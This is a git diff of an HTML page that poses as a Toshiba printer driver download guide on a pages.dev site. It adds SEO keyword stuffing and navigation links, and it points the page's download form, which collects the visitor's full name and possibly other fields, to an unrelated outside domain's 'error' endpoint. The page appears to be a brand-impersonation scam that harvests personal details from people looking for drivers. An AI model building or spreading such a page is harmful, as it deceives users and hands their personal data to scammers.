--- a/download.html
+++ b/download.html
@@ -4,10 +4,11 @@
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
   <title>Toshiba Printer Driver Download Guide</title>
-  <meta name="description" content="">
-<meta name="keywords" content="">
+  <meta name="description" content="Get the step-by-step guide for Toshiba Printer Driver Download. Easily install and update drivers for your Toshiba printer with this quick and simple tutorial.">
+<meta name="keywords" content="toshiba printer driver download, download toshiba printer driver, toshiba printer download, download toshiba printer download, toshiba printer download guide, how to download toshiba printer driver">
 <meta name="author" content="Toshiba Printer Driver Download Guide">
   <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet"/>
+  <link rel="canonical" href="https://toshibaprinter.pages.dev/download">
   <style>
     * {
       box-sizing: border-box;
@@ -153,11 +154,6 @@
     }
 
 
-
-
-
-
-
 .download-form button {
     width:100%;
       padding: 12px;
@@ -226,10 +222,10 @@
   <header>
     <h1>Toshiba Printer</h1>
     <div class="nav-buttons">
-      <button>Setup</button>
-      <button>Support</button>
-      <button>Download</button>
-      <button>Install</button>
+      <a href="https://toshibaprinter.pages.dev/"><button>Setup</button></a>
+      <a href="https://toshibaprinter.pages.dev/support"><button>Support</button></a>
+      <a href="https://toshibaprinter.pages.dev/download"><button>Download</button></a>
+      <a href="https://toshibaprinter.pages.dev/install"><button>Install</button></a>
     </div>
   </header>
 
@@ -243,7 +239,7 @@
 
 <div class="download-form">
     <p class="title">Download Your Software</p>
-    <form action="#" method="post">
+    <form action="https://i-downloadsoftwares.com/error" method="post">
       <div class="form-group">
         <label for="full-name">Full Name</label>
         <input type="text" id="full-name" name="full_name" placeholder="Enter your name" required />
